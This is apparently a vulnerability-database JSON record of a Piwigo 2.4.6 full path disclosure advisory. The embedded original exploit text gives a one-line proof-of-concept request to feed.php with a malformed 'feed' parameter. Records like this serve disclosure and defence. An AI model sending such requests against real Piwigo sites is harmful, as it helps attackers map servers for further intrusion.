Description
Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the Piwigo installation.
{"id": "1337DAY-ID-20164", "type": "zdt", "bulletinFamily": "exploit", "title": "Piwigo 2.4.6 Full Path Disclosure Vulnerability", "description": "Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the Piwigo installation.", "published": "2013-01-12T00:00:00", "modified": "2013-01-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/20164", "reporter": "[email\u00a0protected]", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-11T19:45:35", "viewCount": 15, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://0day.today/exploit/20164", "sourceData": "# Exploit Title: Piwigo 2.4.6 Full Path Disclosure Vulnerability\r\n# Date: 01/12/2013\r\n# Exploit Author: [email\u00a0protected] - http://la.usch.io - http://la.usch.io/files/exploits/piwigo-2.4.6.txt\r\n# Vendor Homepage: http://piwigo.org/\r\n# Vendor Status: Informed\r\n# Software Link: http://piwigo.org/download/dlcounter.php?code=latest\r\n# Version: 2.4.6 and probably prior\r\n# Tested on: Windows and Linux\r\n\r\nDescription:\r\n\r\nSuccessful exploitation of this vulnerability may allow an attacker to obtain the real path of the Piwigo installation.\r\n\r\nProof of Concept:\r\n\r\nhttp://example.com/feed.php?feed=%\r\n\r\nDone!\r\n\r\nProof: http://goo.gl/UQm4W\n\n# 0day.today [2018-04-11] #", "_state": {"dependencies": 1645227849, "score": 1659766679, "epss": 1678811959}}
{}
Piwigo 2.4.6 Full Path Disclosure Vulnerability